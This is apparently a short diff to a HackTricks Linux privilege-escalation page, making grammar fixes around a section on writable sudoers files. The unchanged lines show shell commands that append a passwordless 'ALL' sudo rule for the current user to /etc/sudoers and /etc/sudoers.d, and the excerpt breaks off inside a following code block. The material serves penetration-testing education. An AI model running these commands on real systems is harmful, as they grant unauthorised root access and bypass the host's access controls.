HackTricks-wiki/hacktricks/linux-hardening/privilege-escalation/README.md

 ls -ld /etc/sudoers.d/
 ```

-If you can write you can abuse this permissions
+If you can write you can abuse this permission

 ```bash
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
 echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README
 ```

-Other way to abuse these permissions:
+Another way to abuse these permissions:

 ```bash
 # makes it so every terminal can sudo